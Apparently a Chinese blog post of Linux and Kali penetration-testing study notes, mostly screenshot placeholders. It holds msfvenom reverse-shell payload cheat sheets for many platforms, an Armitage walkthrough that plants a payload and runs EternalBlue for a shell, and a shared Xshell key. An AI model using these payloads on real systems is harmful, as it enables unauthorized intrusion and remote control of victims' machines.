运维知识点-linux系统

news2024/11/26 0:26:10

在这里插入图片描述

linux

  • 操作系统的目录结构和文件属性
  • 快捷键使用及文件系统分类
  • 对操作系统进行信息查询
  • 增删改查基础命令
  • black Arch Linux Vmware 安装
  • 宝塔面板
    • ssl初始化
        • 安装
    • 查看默认入口和账号密码:
    • 腾讯云 专享版
  • 渗透工具-白帽安全工程师Kali
  • ubuntu 20.04 安装metasploit
  • msfvenom常用生成 Payload 命令
  • 2022 安装 Armitage 傻瓜渗透msf
    • 介绍
    • 官网下载
    • build安装
    • 配置数据库
    • 扫描内网主机
    • 检查漏洞风险
  • 出现拒接连接问题
  • Kali linux 介绍安装及入门
        • 前身 BackTrack(BT) <--- ubuntu
        • kali <--- Debian linux 发行版
    • KaliLinux 渗透测试 艺术
      • U盘安装
    • 可以U盘启动
            • (如果虚拟机 稍后引导iso文件 且 移除暂时不用的组件)
            • 网速够快 NET适配 软件更新源(不建议)
            • 网速不行Vmnet1 (仅主机模式)
          • Ctrl+Alt+insert (重启系统)
        • 分区
          • (建议)使用整个磁盘 将所有文件放在同一个分区
        • 安装虚拟工具
        • 记录init 快照
        • 资源连接
    • 在这里插入图片描述
  • tools install
      • 更新
  • 易锦大学 热身 20211007 by:aming
    • CLAY 的 故事
    • 黑猫
    • 白猫
    • 红客
    • 网络安全法
  • 渗透测试 套路
  • 第二章--第1节--kali linux搭建
    • Kali Linux 2020.1修改root用户密码
    • 锁屏
    • msfvenom常用生成payload命令
    • Meterpreter持久控制服务器
    • Kali实战--HTTPS账户密码获取
    • ***HTTPS账户密码获取***
    • 实验环境:
    • SSH 连接
    • Wordpress渗透之Wpscan工具
    • 0708 centos matesploit 搭建
  • 通过ngrok穿透反弹shell
    • 0.0注册ngrok 内网穿透平台账号,开通免费隧道
    • 0x01 下载安装穿透client客户端
    • 0x02 Msfvenom 木&马生成
    • 0x03 启动msf 配置Exploit模块
    • 0x04 选择攻击载荷上线
  • Frp将外网meterpreter转发至本地msf
          • Msf Matesploit Framework 基础
    • 术语
    • 运行
  • 手撕metasploit中meterprter木马源码
      • 前言
    • 生成meterpreter木马
      • 使用Jd-Gui反编译Jar文件
      • 分析源码
      • 如何做到源码级免杀
    • Metasploit实战:SSH漏洞攻击
    • kali linux 系列 —— Metasploit 信息收集
    • KaliLinux——Metasploit&&shellcode日Android
          • #日android原理#
          • #日android条件#

操作系统的目录结构和文件属性

在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述

快捷键使用及文件系统分类

在这里插入图片描述

在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述
在这里插入图片描述在这里插入图片描述

对操作系统进行信息查询

在这里插入图片描述在这里插入图片描述在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述

在这里插入图片描述在这里插入图片描述

在这里插入图片描述在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

增删改查基础命令

在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述

black Arch Linux Vmware 安装

https://archlinux.org/download/

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

vim /etc/pacman.d/mirrorlist

在这里插入图片描述
把中国的镜像列表移动到首个镜像列表之上,然后保存退出

在这里插入图片描述
在这里插入图片描述
此时的设备是 Disk: /dev/sda

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

12.格式化分区,这里注意 1M 的 /dev/sda1 分区不用格式化,
只需要把 /dev/sda2 分区格式化即可

mkfs.ext4 /dev/sda2

在这里插入图片描述
13.挂载分区 /dev/sda2 到 /mnt 下

mount /dev/sda2 /mnt

在这里插入图片描述
14.执行安装命令

这里要主要哦,
比较旧的Arch 安装教程只安装了 base 和 base-devel,
而 linux 与 linux-firmware 没有安装,
wiki 文档说明了,linux 和linux-firmware 要安装的。

pacstrap /mnt base  linux linux-firmware

在这里插入图片描述
在这里插入图片描述

15.配置 fstab

genfstab -U /mnt >> /mnt/etc/fstab

16.切换到新安装的系统

arch-chroot /mnt

在这里插入图片描述

17.设置时区

ln -sf /usr/share/zoneinfo/Asia/Shanghai /etc/localtime
18.设置硬件时间

hwclock --systohc --utc
19.为了编辑文件方便,在新系统安装 vim

pacman -S vim

在这里插入图片描述

20.系统本地化,打开 /etc/locale.gen 文件,把 en_US.UTF-8 UTF-8 的注释去掉,然后wq保存退出
在这里插入图片描述在这里插入图片描述

vim /etc/locale.gen
在这里插入图片描述
在这里插入图片描述

12.执行 locale-gen 生成 locale 信息

locale-gen

22.创建 locale.conf 文件

echo LANG=en_US.UTF-8 > /etc/locale.conf

在这里插入图片描述

23.安装grub

pacman -S grub

grub-install --target=i386-pc /dev/sda

在这里插入图片描述

注意是 /dev/sda 而不是 /dev/sda1 或 /dev/sda2 啥的。

安装成功后,如下图
在这里插入图片描述
24.生成 grub 配置文件

grub-mkconfig -o /boot/grub/grub.cfg

在这里插入图片描述

25.更改 root 密码

passwd root

在这里插入图片描述

26.网络配置

pacman -S dhcpcd

在这里插入图片描述

27.设置开机自启启动 dhcpcd

systemctl enable dhcpcd
在这里插入图片描述

至此大功告成!!!

28.退出

exit

29.重启

reboot

在这里插入图片描述
在这里插入图片描述




在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

root
blackarch

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

此步骤 省略******************************************************************

在这里插入图片描述

1 使用Pacman软件包管理器从存储仓库安装
这是选择通过网络安装ISO的推荐选项,这可以从Arch和BlackArch的官方存储仓库中获取所需的安装包。
2 从Live-ISO安装
如果你下载了Live ISO文件而且你选择以这种方式安装的话,那么在安装的过程中就不需要网络连接。然而,为了获取系统更		
新,在安装完成后,一旦到达安装环境(在你引导进入新的安装之后)使用pacman-Syyu开始一个通用的更新。
3 使用blackman从安装源安装
这种安装方法不推荐刚开始接触BlackArch的人使用,和pacman直接从存储仓库获取已经编译好的安装包不同的是,这种安装		
方法将从安装源获取源代码之后再进行编译。这和emerge在可用于Gentoo系统上的方法类似(blackman只是从源代码编译,	
emerge有更高级的灵活性而且提供了大量的特性)

在这里插入图片描述

在这里插入图片描述

 静默
 2
 你可能已经选定了你想要的keymap按键映射。
 如果你的键盘是一个全键盘,你可以继续使用美式键码,然而,情况可能并非总是如此。
 如果你无法确定,你可能需要在BlackArch中通过选择2来列举出所有可用的按键映射。
 大多数时候,都是使用的英语国家的代码。
 对于法国的AZERTY键盘,按键映射的代码是fr,对于西班牙语则是es等等。如果你知道按键映射,选择1

在这里插入图片描述

	2

在这里插入图片描述
在这里插入图片描述

2
:q

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

宝塔面板

ssl初始化

安装
yum install -y wget && wget -O install.sh http://download.bt.cn/install/install_6.0.sh && sh install.sh

在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述

查看默认入口和账号密码:

bt default

腾讯云 专享版

在这里插入图片描述

https://console.cloud.tencent.com/cam/capi

渗透工具-白帽安全工程师Kali

ubuntu 20.04 安装metasploit

拉取安装文件,修改权限,执行安装


curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \ 



> chmod 755 msfinstall && \
> ./msfinstall

使用msfconsole

msfvenom常用生成 Payload 命令

windows:

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o payload.exe

mac:

msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f macho -o payload.macho

android:

//需要签名 
msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f apk -o payload.apk

powershell:

msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1

linux:

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f elf -o payload.elf

php:

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

aspx:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f aspx -o payload.aspx

jsp:

msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.jsp

war:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw - o payload.war

nodejs:

msfvenom -p nodejs/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.js

python:

msfvenom -p python/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.py

perl:

msfvenom -p cmd/unix/reverse_perl LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.pl

ruby:

msfvenom -p ruby/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.rb

lua:

msfvenom -p cmd/unix/reverse_lua LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.lua

windows shellcode:

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c

linux shellcode:

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c

mac shellcode:

msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c
 Options:

-p, --payload <payload> 使用指定的payload
--payload-options 列出该payload参数
-l, --list [type] 列出所有的payloads
-n, --nopsled <length> 为payload指定一个 nopsled 长度
-f, --format <format> 指定payload生成格式
--help-formats 查看所有支持格式
-e, --encoder <encoder> 使用编码器
-a, --arch <arch> 指定payload构架
--platform <platform> 指定payload平台
--help-platforms 显示支持的平台
-s, --space <length> 设定payload攻击荷载的最大长度
--encoder-space <length> The maximum size of the encoded payload

(defaults to the -s value)
-b, --bad-chars <list> 指定bad-chars 如: '\x00\xff'
-i, --iterations <count> 指定编码次数
-c, --add-code <path> 指定个win32 shellcode 文件
-x, --template <path> 指定一个 executable 文件作为模板
-k, --keep payload自动分离并注入到新的进程
-o, --out <path> 存放生成的payload
-v, --var-name <name> 指定自定义变量
--smallest Generate the smallest possible payload
-h, --help 显示帮助文件

在这里插入图片描述
在这里插入图片描述

2022 安装 Armitage 傻瓜渗透msf

msf是一个很好的渗透测试框架,但是苦于众多的指令,
因此出现一款软件可以将其图形化显示,这就是大名鼎鼎的armitage。

介绍

Armitage是一款Java写的Metasploit图形界面化的渗透软件,
可以用它结合Metasploit中已知的exploit来针对内网主机存在的漏洞自动化渗透,
由于作者已经不再更新版本,目前在kali linux 中是默认不安装的。

官网下载

kali tools地址:https://www.kali.org/tools/armitage/

下载地址:https://gitlab.com/kalilinux/packages/armitage

在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述

build安装

打开终端:
┌──(kali㉿kali)-[~/桌面/111/armitage-kali-master]
└─$ ./package.sh

在这里插入图片描述

结束后在release里面有unix和windows两个文件夹。
在这里插入图片描述
在这里插入图片描述

打开终端:
┌──(kali㉿kali)-[~/桌面/111/armitage-kali-master/release/unix/]
└─$ ./armitage

就可以运行了,但是这时候运行会出现问题,还需要配置数据库。

配置数据库

数据的默认地址是:
/etc/postgresql/
后面是版本号:14/main/
cd /etc/postgresql/14/main/
在这里插入图片描述
全部注释掉,然后加上:
vim pg_hba.conf

# "local" is for Unix domain socket connections only
local   all             all                           trust
# IPv4 local connections:
host    all             all             127.0.0.1/32            trust
# IPv6 local connections:
host    all             all             ::1/128                 trust
	

然后执行下面代码:

 ┌──(kali㉿kali)-[~]
└─$ sudo service postgresql stop 

┌──(kali㉿kali)-[~]
└─$ sudo msfdb  reinit 

┌──(kali㉿kali)-[~]
└─$ sudo service postgresql start

┌──(kali㉿kali)-[~/桌面/111/armitage-kali-master/release/unix/]
└─$ sudo ./armitage

update-rc.d postgresql enable

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述在这里插入图片描述

选中“payload”, 然后选择“windows” ➡️“meterpreter”, 找到所需的攻击载荷(即meterpreter_reverse_tcp)来充当被控端

在这里插入图片描述

双击这个攻击载荷,会弹出下图的界面,在该界面中可以对meterpreter_reverse_tcp进行设置
在这里插入图片描述
为meterpreter_reverse_tcp这个发出去的攻击载荷创建了一个主控端,Metasploit也将这个主控端称为handler。但是我们可能要控制多个攻击载荷,所以要将这个handler设置得跟攻击载荷一样。产生攻击载荷的命令如下:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.68.125 LPORT=5000 -f exe -o /root/payload.exe

使用相同的步骤,我们可以产生一个被控端,这里将其端口设置为5000,“Output”处选择要输出的格式,这里设置为exe,
在这里插入图片描述
单击“Launch”按钮,会产生一个基于meterpreter_reverse_tcp的被控端,并在原来的命令行窗口旁边产生一个新的控制窗口,这个窗口可以用来接收来自我们刚创建的被控端返回的连接在这里插入图片描述
只需在目标主机上执行这个攻击载荷,就可以使用这个handler来控制目标主机了。现在将攻击载荷移动到目标主机中,当这个攻击载荷执行以后,我们就可以从远程控制目标主机了
在这里插入图片描述

扫描内网主机

在这里插入图片描述
在这里插入图片描述

检查漏洞风险

在这里插入图片描述
扫描 可能的风险。

选择一个你想测试的主机,然后在左侧寻找可以使用的exp,在这里我就使用永恒之蓝.
在这里插入图片描述
ms17
双击这个exp文件,便会弹出一个设置框,
这里我们只需要设置目标ip(rhost),也可以根据自己设置

在这里插入图片描述
开始攻击,攻击成功后便会获取到目标主机的shell。

在这里插入图片描述
靶机图标变成了显眼的红色且被闪电缠绕,生动形象地表示出了这台主机已经被攻击过.
依次选择Shell->Interact。便可以使用shell输入命令了。

出现拒接连接问题

问题
在输入正确的账号密码之后,任然跳出错误信息窗口显示有::

不支援 10 验证类型。请核对您已经组态 pg_hba.conf 文件包含客户端的IP位址或网路区段,以及驱动程序所支援的验证架构模式已被支援。

解决方法
1.安装Armitage ,官网下载压缩包或kali下输入 armitage , 按提示进行安装

2.启动postgresql服务

/etc/init.d/postgresql start
3.初始化msfdb

msfdb init

4.启动msfconsole

msfconsole

5.查看数据库连接状态

db_status

如果显示的是 postgresql selected,no connection 则有问题,可以退出msfconsole输入

msfdb reinit

再进入msfconsole查看会显示:
在这里插入图片描述

6.查看连接的账号密码
在这里插入图片描述

7.启动Armitage
输入正确的账号密码后(该密码在每次输入上面的命令后显示的都不一样),出现错误原因与数据库配置有关系。
8.配置postgresql

在这里插入图片描述

Kali linux 介绍安装及入门

前身 BackTrack(BT) <— ubuntu
kali <— Debian linux 发行版

功能: 数字取证 渗透测试 黑客攻防 安全系统 支持ARM架构
开发团队:Offensive Security Devon Kearns

KaliLinux 渗透测试 艺术

在这里插入图片描述

在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述
预装软件:
nmap (端口扫描)
Wireshark(数据包分析)
John the Ripper (密码破解)
Aircrack-ng(无线局域网测试套装)
Metasploit Framework(针对远程主机开发/执行Exploit codeing Tools)

运行:
硬盘启动 liveCD liveUSB

U盘安装

建议下载 win32 Disk Imager
写入镜像 --> u盘

可以U盘启动

32/64 可能是AMD架构
在这里插入图片描述 自己区分 有人说32-i386位的好用 ,自己测试
512MB以上
20GB以上

(如果虚拟机 稍后引导iso文件 且 移除暂时不用的组件)
网速够快 NET适配 软件更新源(不建议)
网速不行Vmnet1 (仅主机模式)
Ctrl+Alt+insert (重启系统)

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

引导顺序 硬盘 光盘 u盘(有系统物理机 更改引导顺序eg:F12)
开机启动中时候
F12 /Esc
在这里插入图片描述

在这里插入图片描述
install
自己选择语言
帐号密码

分区

LVM Logical Volume Manager(逻辑卷管理)
Linux环境下对磁盘分区进行管理的一种机制

(建议)使用整个磁盘 将所有文件放在同一个分区

写入磁盘
在这里插入图片描述
不使用网络镜像
GRUB 引导启动 /dev/sda
(密码忘了的话 --> 去看看linux 密码破解攻防系列)

安装虚拟工具

umount / dev / sr0 卸载光盘
clear
mount /dev /sr0 /media 挂载
ls /media
cd /media
tar zxvf xxx.tar.gz -C /xxx/xxx
cd /xxx/xxx
ls
./vmware-install.pl
默认回车
在这里插入图片描述
死循环 填写no
安装完毕
sync 保存当前配置
reboot 重启

记录init 快照

在这里插入图片描述

###  查看预装软件   

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

完毕简单测试下

强行更改ip
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
:wq


https://mirrors.tuna.tsinghua.edu.cn/kali-images/kali-2021.1/

资源连接

kali下载连接:https://www.kali.org/downloads/
在这里插入图片描述

在这里插入图片描述

#中科大
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
 
#阿里云
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
 
#清华大学
deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
  
#官方源
deb http://http.kali.org/kali kali-rolling main non-free contrib
deb-src http://http.kali.org/kali kali-rolling main non-free contrib
  

#阿里巴巴
deb http://http.kali.org/kali kali-rolling main non-free contrib
 
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib

在这里插入图片描述

apt-get update //获取最新软件包的列表


apt-get dist-upgrade 将根据需要安装或删除软件包以完成升级,
apt-get upgrade 将自动安装但不会删除包。
apt --fix-broken install

安装fcitx
apt-get install fcitx

 apt-get install fcitx fcitx.googlepinyin

三、下载搜狗输入法

   https://pinyin.sogou.com/linux/

在这里插入图片描述

 sudo dpkg -i sogoupinyin_版本号_amd64.deb
注:
如果安装过程中提示缺少相关依赖,则执行如下命令解决:
sudo apt -f install

apt-getinstallibus ibus-pinyin

在这里插入图片描述
2020 版本 非root用户 使用标准的非特权用户来增加额外的安全性
】- kali kali

在这里插入图片描述

需要root访问的工具,以及诸如启动/停止服务等常见的管理功能,将以交互方式请求管理权限(至少在从Kali菜单启动时)

我们不再为每个桌面环境(DE)提供单独的映像。
相反,我们现在有一个单独的映像,可以选择在安装期间选择DE。
这意味着没有Xfce(这是我们从2019.4开始的默认选项)、GNOME、KDE、MATE或LXDE桌面的下载链接


在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述



tools install

在这里插入图片描述在这里插入图片描述
cd /media/cdrom0/ 双击打开

在这里插入图片描述

cd 
ls
sudo tar zxvf  VM+TAB补全 -C /root

在这里插入图片描述在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述


更新

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述

  • 更新之前 先要 换源
    在这里插入图片描述
#中科大
 
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
 
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib


#阿里云
 
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
 
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib

#清华大学
 
deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
 
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free

#浙大
 
deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
 
deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free

#东软大学
 
deb http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib
 
deb-src http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib

#官方源
 
deb http://http.kali.org/kali kali-rolling main non-free contrib
 
deb-src http://http.kali.org/kali kali-rolling main non-free contrib

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

  • 我是全选了 源

    apt-get update && apt-get upgrade && apt-get clean

在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

易锦大学 热身 20211007 by:aming

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

CLAY 的 故事

在这里插入图片描述
在这里插入图片描述

黑猫

在这里插入图片描述

白猫

在这里插入图片描述

红客

在这里插入图片描述

网络安全法

在这里插入图片描述
在这里插入图片描述

渗透测试 套路

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

第二章–第1节–kali linux搭建

Kali Linux 2020.1修改root用户密码

安装Kali Linux 2020.1系统后,需要使用root用户权限安装软件。
由于root用户的默认密码未知,所以需要在单用户模式下重新设置root用户密码。
操作步骤如下:

(1)启动Kali Linux,进入启动界面。
(2)选择Kali GNU/Linux项,并按下e键,进入Grub编辑界面。
在这里插入图片描述

(3)选择linux那一行,将ro 改为 rw 在此行末尾增加 init=/bin/bash 修改完毕以后按Ctrl+X 键进入单用户模式
在这里插入图片描述
(4)按下Ctrl+X或F10重新启动系统,即可进入单用户模式。。
在这里插入图片描述
(5)执行passwd命令,输入两次密码。注意,输入的密码是不显示的。
在这里插入图片描述

vim/cat   /etc/shadow

在这里插入图片描述
(6)重启Kali 到此登陆页面,输入刚才设置的账号密码,回车进行登陆,至此已经使用root账号登陆成功
在这里插入图片描述

— 上面错误 直接关闭虚拟机 再打开就重启

在这里插入图片描述

锁屏

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

msfvenom常用生成payload命令

在这里插入图片描述
在这里插入图片描述

windows:
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=
攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b ‘\x00\x0a\xff’ -i 3 -f exe -o
payload.exe
mac:
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP
LPORT=攻击机端口 -f macho -o payload.macho
android:
//需要签名
msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=攻
击机IP LPORT=攻击机端口 -f apk -o payload.apk
powershell:
msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=
攻击机IP LPORT=攻击机端口 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1
linux:
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻
击机IP LPORT=攻击机端口 -f elf -o payload.elf
php:
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT=
-f raw > shell.php
cat shell.php | pbcopy && echo '<?php ’ | tr -d ‘\n’ > shell.php && pbpaste >>
shell.php
aspx:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=
攻击机IP LPORT=攻击机端口 -f aspx -o payload.aspx
jsp:
msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻
击机端口 -f raw -o payload.jsp
war:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -
o payload.war
nodejs:
msfvenom -p nodejs/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o
payload.js
python:
msfvenom -p python/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -
f raw -o payload.py
perl:
msfvenom -p cmd/unix/reverse_perl LHOST=攻击机IP LPORT=攻击机端口 -f raw -o
payload.pl
ruby:
msfvenom -p ruby/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o
payload.rb
lua:
msfvenom -p cmd/unix/reverse_lua LHOST=攻击机IP LPORT=攻击机端口 -f raw -o
payload.lua
windows shellcode:
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=
攻击机IP LPORT=攻击机端口 -f c
linux shellcode:
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻
击机IP LPORT=攻击机端口 -f c
mac shellcode:
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP
LPORT=攻击机端口 -f c

Meterpreter持久控制服务器

在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述

Kali实战–HTTPS账户密码获取

HTTPS账户密码获取

HTTPS(全称:Hyper Text Transfer Protocol over SecureSocket Layer)
以安全为目标的 HTTP 通道
在HTTP的基础上通过传输加密和身份认证保证了传输过程的安全性
HTTPS 在HTTP 的基础下加入SSL 层,
HTTPS 的安全基础是 SSL,因此加密的详细内容就需要 SSL。
HTTPS 存在不同于 HTTP 的默认端口及一个加密/身份验证层(在 HTTP与 TCP 之间)。
这个系统提供了身份验证与加密通讯方法。
现在它被广泛用于万维网上安全敏感的通讯,例如交易支付等方面

实验环境:

在这里插入图片描述

SSH 连接

Ctrl+Alt+F1命令行界面登陆运行 或者 init 3(有的童鞋虚拟机)
init+数字所代表的命令:
0:停机或者关机(千万不能将initdefault设置为0)
1:单用户模式,只root用户进行维护
2:多用户模式,不能使用NFS(Net File System)
3:完全多用户模式(标准的运行级别)
4:安全模式
5:图形化(即图形界面)
6:重启(千万不要把initdefault设置为6)

注意命令模式开机可能 numlock是锁着的 打开小写键盘 (密码可能带有数字)
在这里插入图片描述
在这里插入图片描述
logout ###让用户退出系统的Linux命令。

在这里插入图片描述
在这里插入图片描述
###出了点小插曲
在这里插入图片描述
ssh连接 如果出现了 access denied
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
###还有一个故障 就是 init转换后图形化登陆循环
在网上找找有相应教程这里就不说了

##弄一个 xshell 得资源 需要的自取
690313-111999-999313 码
链接:https://share.weiyun.com/505zSO7 密码:rnawkn

Xshell 连上了在这里插入图片描述
在这里插入图片描述
之前用的 putty suite Xshell比putty功能强大
所以果断换 eg:复制SSH渠道
或者 Xshell:> ls 显示连接主机用户
